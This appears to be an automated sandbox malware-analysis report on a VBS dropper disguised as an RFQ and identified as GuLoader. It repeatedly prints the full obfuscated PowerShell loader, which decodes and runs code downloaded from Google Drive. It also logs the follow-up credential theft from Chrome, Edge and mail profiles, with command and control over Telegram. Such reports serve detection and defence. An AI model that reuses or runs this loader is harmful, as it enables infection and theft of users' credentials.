              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              3
              Obfuscated Files or Information
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Software Packing
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
              Virtualization/Sandbox Evasion
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530594 Sample: #U8a62#U50f9 (RFQ) -RFQ2024... Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 api.telegram.org 2->25 27 5 other IPs or domains 2->27 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Yara detected GuLoader 2->43 49 5 other signatures 2->49 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 45 Tries to detect the country of the analysis system (by using the IP) 23->45 47 Uses the Telegram API (likely for C&C communication) 25->47 process4 signatures5 51 Early bird code injection technique detected 8->51 53 Writes to foreign memory regions 8->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 8->55 57 Queues an APC in another process (thread injection) 8->57 13 msiexec.exe 15 8 8->13         started        17 conhost.exe 8->17         started        59 VBScript performs obfuscated calls to suspicious functions 11->59 61 Suspicious powershell command line found 11->61 63 Wscript starts Powershell (via cmd or directly) 11->63 65 Suspicious execution chain found 11->65 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 29 api.telegram.org 149.154.167.220, 443, 49995 TELEGRAMRU United Kingdom 13->29 31 reallyfreegeoip.org 188.114.97.3, 443, 49978, 49980 CLOUDFLARENETUS European Union 13->31 33 checkip.dyndns.com 132.226.8.169, 49975, 49981, 49983 UTMEMUS United States 13->33 67 Tries to steal Mail credentials (via file / registry access) 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 35 drive.usercontent.google.com 142.250.185.161, 443, 49747, 49974 GOOGLEUS United States 19->35 37 drive.google.com 142.250.186.142, 443, 49737, 49969 GOOGLEUS United States 19->37 71 Found suspicious powershell code related to unpacking or dynamic code loading 19->71 21 conhost.exe 19->21         started        signatures8 process9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              #U8a62#U50f9 (RFQ) -RFQ20241010.vbs6%VirustotalBrowse
              #U8a62#U50f9 (RFQ) -RFQ20241010.vbs3%ReversingLabsWin32.Dropper.Generic
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              reallyfreegeoip.org0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse
              drive.google.com0%VirustotalBrowse
              api.telegram.org2%VirustotalBrowse
              checkip.dyndns.com0%VirustotalBrowse
              checkip.dyndns.org0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
